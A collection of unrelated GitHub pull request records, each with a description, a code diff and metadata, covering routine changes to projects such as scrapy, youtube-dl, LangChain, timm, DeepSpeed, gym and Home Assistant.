<!-- Thank you for taking the time to work on a Pull Request for this project! --> <!-- To ensure your PR is dealt with swiftly please check the following: --> - [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md) - [x] My addition is ordered alphabetically - [x] My submission has a useful description - [x] The description does not have more than 100 characters - [x] The description does not end with punctuation - [x] Each table column is padded with one space on either side - [x] I have searched the repository for any relevant issues or pull requests - [ ] Any category I am creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/2583
2021-10-17T02:25:41Z
2021-10-26T06:09:28Z
2021-10-26T06:09:28Z
2021-10-26T06:09:28Z
234
public-apis/public-apis
36,100
chore: Removing tests/requirements.txt and adding dependencies to the tox.ini file
diff --git a/conftest.py b/conftest.py index 2bfa46f5a27..2ab3dffd425 100644 --- a/conftest.py +++ b/conftest.py @@ -1,10 +1,6 @@ -import platform -import sys from pathlib import Path import pytest -from twisted import version as twisted_version -from twisted.python.versions import Version from twisted.web.http import H2_ENABLED from scrapy.utils.reactor import install_reactor @@ -85,14 +81,12 @@ def only_not_asyncio(request, reactor_pytest): def requires_uvloop(request): if not request.node.get_closest_marker("requires_uvloop"): return - if sys.implementation.name == "pypy": - pytest.skip("uvloop does not support pypy properly") - if platform.system() == "Windows": - pytest.skip("uvloop does not support Windows") - if twisted_version == Version("twisted", 21, 2, 0): - pytest.skip("https://twistedmatrix.com/trac/ticket/10106") - if sys.version_info >= (3, 12): - pytest.skip("uvloop doesn't support Python 3.12 yet") + try: + import uvloop + + del uvloop + except ImportError: + pytest.skip("uvloop is not installed") def pytest_configure(config): diff --git a/tests/requirements.txt b/tests/requirements.txt deleted file mode 100644 index ca5f6ddbd93..00000000000 --- a/tests/requirements.txt +++ /dev/null @@ -1,17 +0,0 @@ -# Tests requirements -attrs -pexpect >= 4.8.0 -pyftpdlib >= 1.5.8 -pytest -pytest-cov==4.0.0 -pytest-xdist -sybil >= 1.3.0 # https://github.com/cjw296/sybil/issues/20#issuecomment-605433422 -testfixtures -uvloop; platform_system != "Windows" - -bpython # optional for shell wrapper tests -brotli; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests -brotlicffi; implementation_name == 'pypy' # optional for HTTP compress downloader middleware tests -zstandard; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests -ipython -pywin32; sys_platform == "win32" diff --git a/tox.ini b/tox.ini index 237aa489c2a..b5effb527e3 100644 --- a/tox.ini +++ b/tox.ini @@ -7,9 +7,23 @@ envlist = pre-commit,pylint,typing,py minversion = 1.7.0 +[test-requirements] +deps = + attrs + pexpect >= 4.8.0 + pyftpdlib >= 1.5.8 + pygments + pytest + pytest-cov==4.0.0 + pytest-xdist + sybil >= 1.3.0 # https://github.com/cjw296/sybil/issues/20#issuecomment-605433422 + testfixtures + pywin32; sys_platform == "win32" + [testenv] deps = - -rtests/requirements.txt + {[test-requirements]deps} + # mitmproxy does not support PyPy mitmproxy; implementation_name != 'pypy' passenv = @@ -81,7 +95,7 @@ deps = w3lib==1.17.0 zope.interface==5.1.0 lxml==4.4.1 - -rtests/requirements.txt + {[test-requirements]deps} # mitmproxy 8.0.0 requires upgrading some of the pinned dependencies # above, hence we do not install it in pinned environments at the moment @@ -124,8 +138,12 @@ deps = robotexclusionrulesparser Pillow Twisted[http2] - brotli - zstandard + uvloop; platform_system != "Windows" + bpython # optional for shell wrapper tests + brotli; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests + brotlicffi; implementation_name == 'pypy' # optional for HTTP compress downloader middleware tests + zstandard; implementation_name != 'pypy' # optional for HTTP compress downloader middleware tests + ipython [testenv:extra-deps-pinned] basepython = python3.8 @@ -136,6 +154,12 @@ deps = Pillow==7.1.0 robotexclusionrulesparser==1.6.2 brotlipy + uvloop==0.14.0; platform_system != "Windows" + bpython==0.7.1 + zstandard==0.1; implementation_name != 'pypy' + ipython==2.0.0 + brotli==0.5.2; implementation_name != 'pypy' + brotlicffi==0.8.0; implementation_name == 'pypy' install_command = {[pinned]install_command} setenv = {[pinned]setenv}
Resolves https://github.com/scrapy/scrapy/issues/6270
https://api.github.com/repos/scrapy/scrapy/pulls/6272
2024-03-06T14:06:42Z
2024-03-13T06:22:48Z
2024-03-13T06:22:48Z
2024-03-13T06:22:48Z
1,210
scrapy/scrapy
34,295
[vgtv] Add new extractor
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py index e49ac3e5278..18f73a8906b 100644 --- a/youtube_dl/extractor/__init__.py +++ b/youtube_dl/extractor/__init__.py @@ -325,6 +325,7 @@ from .veoh import VeohIE from .vesti import VestiIE from .vevo import VevoIE +from .vgtv import VGTVIE from .vh1 import VH1IE from .viddler import ViddlerIE from .videobam import VideoBamIE diff --git a/youtube_dl/extractor/vgtv.py b/youtube_dl/extractor/vgtv.py new file mode 100644 index 00000000000..0964b96aab9 --- /dev/null +++ b/youtube_dl/extractor/vgtv.py @@ -0,0 +1,73 @@ +# coding: utf-8 +from __future__ import unicode_literals + +import re + +from .common import InfoExtractor + +from ..utils import ( + ExtractorError +) + +class VGTVIE(InfoExtractor): + # Because of the #! in the URL structure we need to add ' before and after given URL. + # Or else it will cry: -bash: !/video/100495/lars-og-lars-sesong-6-episode-6-lakselus: event not found + _VALID_URL = r'http://(?:www\.)?vgtv\.no/#!/(?:.*)/(?P<id>[0-9]+)/(?P<title>[^?#]*)' + _TEST = { + 'url': 'http://www.vgtv.no/#!/video/84196/hevnen-er-soet-episode-10-abu', + 'md5': 'b8be7a234cebb840c0d512c78013e02f', + 'info_dict': { + 'id': '84196', + 'ext': 'mp4', + 'title': 'Hevnen er søt episode 10: Abu', + 'description': 'md5:e25e4badb5f544b04341e14abdc72234', + 'timestamp': 1404626400, + 'upload_date': '20140706' + } + } + + def _real_extract(self, url): + mobj = re.match(self._VALID_URL, url) + video_id = mobj.group('id') + + # Download JSON file containing video info. + data = self._download_json('http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website' % video_id, video_id, 'Downloading media JSON') + + # Known streamType: vod, live, wasLive + # Will it even be possible to add support for live streams? + if data['streamType'] != 'vod': + raise ExtractorError('Stream type \'%s\' is not yet supported.' % data['streamType'], expected=True) + + # Add access token to image or it will fail. + thumbnail = data['images']['main'] + '?t[]=900x506q80' + + formats = [] + + # Most videos are in MP4, but some are either HLS or HDS. + # Don't want to support HDS. + if data['streamUrls']['mp4'] is not None: + formats.append({ + 'url': data['streamUrls']['mp4'], + 'format_id': 'mp4', + 'ext': 'mp4' + }) + elif data['streamUrls']['hls'] is not None: + self.to_screen(u'No MP4 URL found, using m3u8. This may take some extra time.') + formats.append({ + 'url': data['streamUrls']['hls'], + 'format_id': 'm3u8', + 'ext': 'mp4' + }) + else: + raise ExtractorError('No download URL found for video: %s.' % video_id, expected=True) + + return { + 'id': video_id, + 'title': data['title'], + 'description': data['description'], + 'thumbnail': thumbnail, + 'timestamp': data['published'], + 'duration': data['duration'], + 'view_count': data['displays'], + 'formats': formats, + } \ No newline at end of file
Because of the #! in the URL structure for VGTV we need to add ' before and after given URL. Or else it will cry: -bash: !/video/100495/lars-og-lars-sesong-6-episode-6-lakselus: event not found
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3678
2014-09-04T19:05:57Z
2014-09-08T14:27:49Z
2014-09-08T14:27:49Z
2014-09-08T14:28:31Z
1,036
ytdl-org/youtube-dl
50,535
partners: add license field
diff --git a/libs/partners/anthropic/pyproject.toml b/libs/partners/anthropic/pyproject.toml index 53ab7dd79fd70a..459d07d3b4ff3a 100644 --- a/libs/partners/anthropic/pyproject.toml +++ b/libs/partners/anthropic/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-anthropic" -version = "0.0.1.post1" +version = "0.0.1.post2" description = "An integration package connecting AnthropicMessages and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/anthropic" diff --git a/libs/partners/google-genai/pyproject.toml b/libs/partners/google-genai/pyproject.toml index f98ed0a765edb9..28884a3cbf13f9 100644 --- a/libs/partners/google-genai/pyproject.toml +++ b/libs/partners/google-genai/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-google-genai" -version = "0.0.6" +version = "0.0.6.post1" description = "An integration package connecting Google's genai package and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/google-genai" diff --git a/libs/partners/google-vertexai/pyproject.toml b/libs/partners/google-vertexai/pyproject.toml index 34c2be261dddac..e1ce09d46cd4da 100644 --- a/libs/partners/google-vertexai/pyproject.toml +++ b/libs/partners/google-vertexai/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting GoogleVertexAI and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/google-vertexai" diff --git a/libs/partners/mistralai/pyproject.toml b/libs/partners/mistralai/pyproject.toml index 807c8c445b595d..dbfc0a7191c3ef 100644 --- a/libs/partners/mistralai/pyproject.toml +++ b/libs/partners/mistralai/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting Mistral and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/mistralai" diff --git a/libs/partners/nvidia-ai-endpoints/pyproject.toml b/libs/partners/nvidia-ai-endpoints/pyproject.toml index 6ba0e0ca90cd5b..0146a6f75f5210 100644 --- a/libs/partners/nvidia-ai-endpoints/pyproject.toml +++ b/libs/partners/nvidia-ai-endpoints/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-nvidia-ai-endpoints" -version = "0.0.1.post1" +version = "0.0.1.post2" description = "An integration package connecting NVIDIA AI Endpoints and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/nvidia-ai-endpoints" diff --git a/libs/partners/nvidia-trt/pyproject.toml b/libs/partners/nvidia-trt/pyproject.toml index a8847942f7648c..2cbaaa6be14031 100644 --- a/libs/partners/nvidia-trt/pyproject.toml +++ b/libs/partners/nvidia-trt/pyproject.toml @@ -5,6 +5,7 @@ description = "An integration package connecting TritonTensorRT and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/nvidia-trt" diff --git a/libs/partners/openai/pyproject.toml b/libs/partners/openai/pyproject.toml index 3cb369ca2eda9b..6bdf5a1f62be3c 100644 --- a/libs/partners/openai/pyproject.toml +++ b/libs/partners/openai/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-openai" -version = "0.0.2.post1" +version = "0.0.2.post2" description = "An integration package connecting OpenAI and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/openai" diff --git a/libs/partners/robocorp/pyproject.toml b/libs/partners/robocorp/pyproject.toml index c80e5d81ed51b5..e8e7974146b09c 100644 --- a/libs/partners/robocorp/pyproject.toml +++ b/libs/partners/robocorp/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-robocorp" -version = "0.0.1.post2" +version = "0.0.1.post3" description = "An integration package connecting Robocorp and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/robocorp" diff --git a/libs/partners/together/pyproject.toml b/libs/partners/together/pyproject.toml index 1193130016117e..6bf4795ce14374 100644 --- a/libs/partners/together/pyproject.toml +++ b/libs/partners/together/pyproject.toml @@ -1,10 +1,11 @@ [tool.poetry] name = "langchain-together" -version = "0.0.2.post1" +version = "0.0.2.post2" description = "An integration package connecting Together and LangChain" authors = [] readme = "README.md" repository = "https://github.com/langchain-ai/langchain" +license = "MIT" [tool.poetry.urls] "Source Code" = "https://github.com/langchain-ai/langchain/tree/master/libs/partners/together"
- bumps package post versions for packages without current unreleased updates - will bump package version in release prs associated with packages that do have changes (mistral, vertex)
https://api.github.com/repos/langchain-ai/langchain/pulls/16117
2024-01-17T01:54:33Z
2024-01-17T16:37:14Z
2024-01-17T16:37:14Z
2024-01-17T16:37:15Z
1,694
langchain-ai/langchain
43,152
scaled_dot_product_attention: don't dropout in eval
diff --git a/timm/models/beit.py b/timm/models/beit.py index 3863198f12..663dcc4bd4 100644 --- a/timm/models/beit.py +++ b/timm/models/beit.py @@ -155,7 +155,7 @@ def forward(self, x, shared_rel_pos_bias: Optional[torch.Tensor] = None): x = F.scaled_dot_product_attention( q, k, v, attn_mask=rel_pos_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/cait.py b/timm/models/cait.py index 4bc7dafc53..40d56061d3 100644 --- a/timm/models/cait.py +++ b/timm/models/cait.py @@ -50,7 +50,7 @@ def forward(self, x): if self.fused_attn: x_cls = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/eva.py b/timm/models/eva.py index 81bcce525d..68b315386c 100644 --- a/timm/models/eva.py +++ b/timm/models/eva.py @@ -126,7 +126,7 @@ def forward( x = F.scaled_dot_product_attention( q, k, v, attn_mask=attn_mask, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/fastvit.py b/timm/models/fastvit.py index d3d9bfdf65..b3143ae58b 100644 --- a/timm/models/fastvit.py +++ b/timm/models/fastvit.py @@ -514,7 +514,7 @@ def forward(self, x: torch.Tensor) -> torch.Tensor: if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/maxxvit.py b/timm/models/maxxvit.py index 12709f5818..6283443ce5 100644 --- a/timm/models/maxxvit.py +++ b/timm/models/maxxvit.py @@ -190,7 +190,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): k.transpose(-1, -2).contiguous(), v.transpose(-1, -2).contiguous(), attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ).transpose(-1, -2).reshape(B, -1, H, W) else: q = q * self.scale @@ -259,7 +259,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/metaformer.py b/timm/models/metaformer.py index 98a79f598b..7b026a2e43 100644 --- a/timm/models/metaformer.py +++ b/timm/models/metaformer.py @@ -198,7 +198,7 @@ def forward(self, x): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: attn = (q @ k.transpose(-2, -1)) * self.scale diff --git a/timm/models/nest.py b/timm/models/nest.py index de57ec6e99..d1901cee21 100644 --- a/timm/models/nest.py +++ b/timm/models/nest.py @@ -59,14 +59,14 @@ def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.) def forward(self, x): """ x is shape: B (batch_size), T (image blocks), N (seq length per image block), C (embed dim) - """ + """ B, T, N, C = x.shape # result of next line is (qkv, B, num (H)eads, T, N, (C')hannels per head) qkv = self.qkv(x).reshape(B, T, N, 3, self.num_heads, C // self.num_heads).permute(3, 0, 4, 1, 2, 5) q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple) if self.fused_attn: - x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p) + x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p if self.training else 0.) else: q = q * self.scale attn = q @ k.transpose(-2, -1) # (B, H, T, N, N) @@ -330,7 +330,7 @@ def __init__( # Hint: (img_size // patch_size) gives number of patches along edge of image. sqrt(self.num_blocks[0]) is the # number of blocks along edge of image self.block_size = int((img_size // patch_size) // math.sqrt(self.num_blocks[0])) - + # Patch embedding self.patch_embed = PatchEmbed( img_size=img_size, diff --git a/timm/models/pvt_v2.py b/timm/models/pvt_v2.py index 00379b158a..16302002eb 100644 --- a/timm/models/pvt_v2.py +++ b/timm/models/pvt_v2.py @@ -130,7 +130,7 @@ def forward(self, x, feat_size: List[int]): k, v = kv.unbind(0) if self.fused_attn: - x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p) + x = F.scaled_dot_product_attention(q, k, v, dropout_p=self.attn_drop.p if self.training else 0.) else: q = q * self.scale attn = q @ k.transpose(-2, -1) diff --git a/timm/models/swin_transformer.py b/timm/models/swin_transformer.py index 41b45afb69..34452c7cf1 100644 --- a/timm/models/swin_transformer.py +++ b/timm/models/swin_transformer.py @@ -164,7 +164,7 @@ def forward(self, x, mask: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_mask, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/twins.py b/timm/models/twins.py index b96a0234d0..3cd25fb433 100644 --- a/timm/models/twins.py +++ b/timm/models/twins.py @@ -75,7 +75,7 @@ def forward(self, x, size: Size_): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -172,7 +172,7 @@ def forward(self, x, size: Size_): if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/visformer.py b/timm/models/visformer.py index 9f5da60be5..953fc64d5e 100644 --- a/timm/models/visformer.py +++ b/timm/models/visformer.py @@ -95,7 +95,7 @@ def forward(self, x): if self.fused_attn: x = torch.nn.functional.scaled_dot_product_attention( q.contiguous(), k.contiguous(), v.contiguous(), - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: attn = (q @ k.transpose(-2, -1)) * self.scale diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py index 10b9296b49..b82b9865f2 100644 --- a/timm/models/vision_transformer.py +++ b/timm/models/vision_transformer.py @@ -85,7 +85,7 @@ def forward(self, x): if self.fused_attn: x = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -285,7 +285,7 @@ def forward(self, x): if self.fused_attn: x_attn = F.scaled_dot_product_attention( q, k, v, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale @@ -1151,7 +1151,7 @@ def _cfg(url='', **kwargs): url='https://dl.fbaipublicfiles.com/dino/dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth', hf_hub_id='timm/', mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0), - + # DINOv2 pretrained - https://arxiv.org/abs/2304.07193 (no classifier head, for fine-tune/features only) 'vit_small_patch14_dinov2.lvd142m': _cfg( url='https://dl.fbaipublicfiles.com/dinov2/dinov2_vits14/dinov2_vits14_pretrain.pth', @@ -1471,7 +1471,7 @@ def _cfg(url='', **kwargs): hf_hub_id='timm/', license='cc-by-nc-4.0', mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0), - + 'vit_huge_patch14_224_ijepa.in1k': _cfg( url='https://dl.fbaipublicfiles.com/ijepa/IN1K-vit.h.14-300e.pth.tar', # hf_hub_id='timm/', @@ -2080,7 +2080,7 @@ def vit_giant_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer: # With SwiGLUPacked, we need to set hidden_features = 2 * 4096 = 8192 model_args = dict( - patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5, + patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5, mlp_ratio=2.66667 * 2, mlp_layer=SwiGLUPacked, img_size=518, act_layer=nn.SiLU ) model = _create_vision_transformer( diff --git a/timm/models/vision_transformer_relpos.py b/timm/models/vision_transformer_relpos.py index ea428587c1..2cd37cfe7e 100644 --- a/timm/models/vision_transformer_relpos.py +++ b/timm/models/vision_transformer_relpos.py @@ -71,7 +71,7 @@ def forward(self, x, shared_rel_pos: Optional[torch.Tensor] = None): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale diff --git a/timm/models/vision_transformer_sam.py b/timm/models/vision_transformer_sam.py index 53c49b071e..59b354fb3d 100644 --- a/timm/models/vision_transformer_sam.py +++ b/timm/models/vision_transformer_sam.py @@ -168,7 +168,7 @@ def forward(self, x): x = torch.nn.functional.scaled_dot_product_attention( q, k, v, attn_mask=attn_bias, - dropout_p=self.attn_drop.p, + dropout_p=self.attn_drop.p if self.training else 0., ) else: q = q * self.scale
This doesn't affect the current models since attn_dropout is 0
https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1978
2023-10-03T19:00:11Z
2023-10-05T15:58:41Z
2023-10-05T15:58:41Z
2023-10-05T15:59:18Z
3,159
huggingface/pytorch-image-models
16,264
Fix potential random layout inconsistency issues in sparse attention modules
diff --git a/deepspeed/ops/sparse_attention/sparse_self_attention.py b/deepspeed/ops/sparse_attention/sparse_self_attention.py index 2e3156049e94..6e7d8905e0a8 100644 --- a/deepspeed/ops/sparse_attention/sparse_self_attention.py +++ b/deepspeed/ops/sparse_attention/sparse_self_attention.py @@ -5,6 +5,7 @@ import torch.nn as nn from torch.nn.functional import * import torch +from torch import distributed as dist from collections import namedtuple from deepspeed.ops.sparse_attention import MatMul, Softmax, SparsityConfig import sys @@ -22,29 +23,50 @@ def __init__( # SparsityConfig parameters needs to be set accordingly sparsity_config=SparsityConfig(num_heads=4), key_padding_mask_mode='add', - attn_mask_mode='mul'): + attn_mask_mode='mul', + max_seq_length=2048): """Initialize the sparse self attention layer. Arguments: sparsity_config: optional: this parameter determins sparsity pattern configuration; it is based on SparsityConfig class. key_padding_mask_mode: optional: a string determining if key padding mask needs to be added, `add`, or be multiplied, `mul`. attn_mask_mode: optional: a string determining if attention mask needs to be added, `add`, or be multiplied, `mul`. + max_seq_length: optional: the maximum sequence length this sparse attention module will be applied to; it controls the size of the master_layout. """ super().__init__() # sparsity information self.sparsity_config = sparsity_config + # initialize sparse layout and register as buffer + master_layout = self.sparsity_config.make_layout(max_seq_length) + self.register_buffer("master_layout", master_layout) + self._need_layout_synchronization = True + # mask modes self.key_padding_mask_mode = key_padding_mask_mode self.attn_mask_mode = attn_mask_mode ops = dict() + def get_layout(self, L): + # if layout is never synchronized across GPUs, broadcast the layout from global rank 0 + if self._need_layout_synchronization and dist.is_initialized(): + dist.broadcast(self.master_layout, src=0) + self._need_layout_synchronization = False + + if (L % self.sparsity_config.block != 0): + raise ValueError( + f'Sequence Length, {L}, needs to be dividable by Block size {self.sparsity_config.block}!' + ) + + num_blocks = L // self.sparsity_config.block + return self.master_layout[..., :num_blocks, :num_blocks].cpu() # layout needs to be a CPU tensor + # add to cache def get_ops(self, H, L): import sys if L not in SparseSelfAttention.ops: - sparsity_layout = self.sparsity_config.make_layout(L) + sparsity_layout = self.get_layout(L) sparse_dot_sdd_nt = MatMul(sparsity_layout, self.sparsity_config.block, 'sdd',
There are two changes made to the SparseSelfAttention module in this PR: 1) Now SparseSelfAttention module will create a "master_layout" upfront and register it as a buffer, this saves us the need to create new layout on-the-fly later (which can cause inconsistency if there's randomness in layout creation) and also makes it easy for us to save & load the layout from checkpoint; 2) Add a broadcast of layout at the beginning to ensure different processes in distributed training will have consistent layout. @arashashari
https://api.github.com/repos/microsoft/DeepSpeed/pulls/534
2020-11-18T00:54:26Z
2020-12-04T22:58:10Z
2020-12-04T22:58:10Z
2020-12-04T22:58:11Z
691
microsoft/DeepSpeed
10,170
Add documentation domain name announcement
diff --git a/README.md b/README.md index fca78cefe3b..0f7487d8c49 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,9 @@ [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white)](https://pre-commit.com/) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) +## Important notice + +### Due to issues with the domain registration, the documentation has been moved to [https://www.gymlibrary.dev/](https://www.gymlibrary.dev/) as opposed to the old .ml address. + ## Gym Gym is an open source Python library for developing and comparing reinforcement learning algorithms by providing a standard API to communicate between learning algorithms and environments, as well as a standard set of environments compliant with that API. Since its release, Gym's API has become the field standard for doing this.
We need to actively make people aware of the address change to avoid potential security issues
https://api.github.com/repos/openai/gym/pulls/3039
2022-08-23T14:00:00Z
2022-08-23T15:10:15Z
2022-08-23T15:10:15Z
2022-08-23T15:10:15Z
241
openai/gym
5,229
Updating the CORS value for restcountries.com
diff --git a/README.md b/README.md index bcd6b8a4ba..77168a4320 100644 --- a/README.md +++ b/README.md @@ -669,7 +669,7 @@ API | Description | Auth | HTTPS | CORS | | [positionstack](https://positionstack.com/) | Forward & Reverse Batch Geocoding REST API | `apiKey` | Yes | Unknown | | [PostcodeData.nl](http://api.postcodedata.nl/v1/postcode/?postcode=1211EP&streetnumber=60&ref=domeinnaam.nl&type=json) | Provide geolocation data based on postcode for Dutch addresses | No | No | Unknown | | [Postcodes.io](https://postcodes.io) | Postcode lookup & Geolocation for the UK | No | Yes | Yes | -| [REST Countries](https://restcountries.com) | Get information about countries via a RESTful API | No | Yes | Unknown | +| [REST Countries](https://restcountries.com) | Get information about countries via a RESTful API | No | Yes | Yes | | [RoadGoat Cities](https://www.roadgoat.com/business/cities-api) | Cities content & photos API | `apiKey` | Yes | No | | [SpotSense](https://www.spotsense.io) | Add location based interactions to your mobile app | `apiKey` | Yes | Unknown | | [Uebermaps](https://uebermaps.com/api/v2) | Discover and share maps with friends | `apiKey` | Yes | Unknown |
Is just an update :)
https://api.github.com/repos/public-apis/public-apis/pulls/2073
2021-09-30T07:13:37Z
2021-09-30T07:49:05Z
2021-09-30T07:49:05Z
2021-09-30T07:49:05Z
337
public-apis/public-apis
35,444
A simpler fix to ensuring the messages view can render
diff --git a/website/src/components/FlaggableElement.tsx b/website/src/components/FlaggableElement.tsx index 9606f4259b..a7157c4a1b 100644 --- a/website/src/components/FlaggableElement.tsx +++ b/website/src/components/FlaggableElement.tsx @@ -36,13 +36,14 @@ interface textFlagLabels { export const FlaggableElement = (props) => { const [isEditing, setIsEditing] = useBoolean(); const flaggable_labels = props.flaggable_labels; - const TEXT_LABEL_FLAGS = flaggable_labels.valid_labels.map((valid_label) => { - return { - attributeName: valid_label.name, - labelText: valid_label.display_text, - additionalExplanation: valid_label.help_text, - }; - }); + const TEXT_LABEL_FLAGS = + flaggable_labels?.valid_labels?.map((valid_label) => { + return { + attributeName: valid_label.name, + labelText: valid_label.display_text, + additionalExplanation: valid_label.help_text, + }; + }) || []; const { trigger } = useSWRMutation("/api/set_label", poster, { onSuccess: () => { setIsEditing.off(); diff --git a/website/src/components/Messages/MessageTable.tsx b/website/src/components/Messages/MessageTable.tsx index bacd27f96d..872b79f17b 100644 --- a/website/src/components/Messages/MessageTable.tsx +++ b/website/src/components/Messages/MessageTable.tsx @@ -5,7 +5,7 @@ export function MessageTable({ messages, valid_labels }) { return ( <Stack divider={<StackDivider />} spacing="4"> {messages.map((item, idx) => ( - <MessageTableEntry item={item} idx={idx} key={item.message_id} valid_labels={valid_labels} /> + <MessageTableEntry item={item} idx={idx} key={item.message_id || item.id} valid_labels={valid_labels} /> ))} </Stack> );
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/588
2023-01-10T08:53:28Z
2023-01-10T10:07:18Z
2023-01-10T10:07:18Z
2023-01-10T10:07:19Z
457
LAION-AI/Open-Assistant
37,523
Remove unnecessary use of async_add_job in openalpr_cloud
diff --git a/homeassistant/components/openalpr_cloud/image_processing.py b/homeassistant/components/openalpr_cloud/image_processing.py index 2c2807f5364f..525edc7da4be 100644 --- a/homeassistant/components/openalpr_cloud/image_processing.py +++ b/homeassistant/components/openalpr_cloud/image_processing.py @@ -142,8 +142,7 @@ def async_process_plates(self, plates: dict[str, float], vehicles: int) -> None: # Send events for i_plate in new_plates: - self.hass.async_add_job( - self.hass.bus.async_fire, + self.hass.bus.async_fire( EVENT_FOUND_PLATE, { ATTR_PLATE: i_plate,
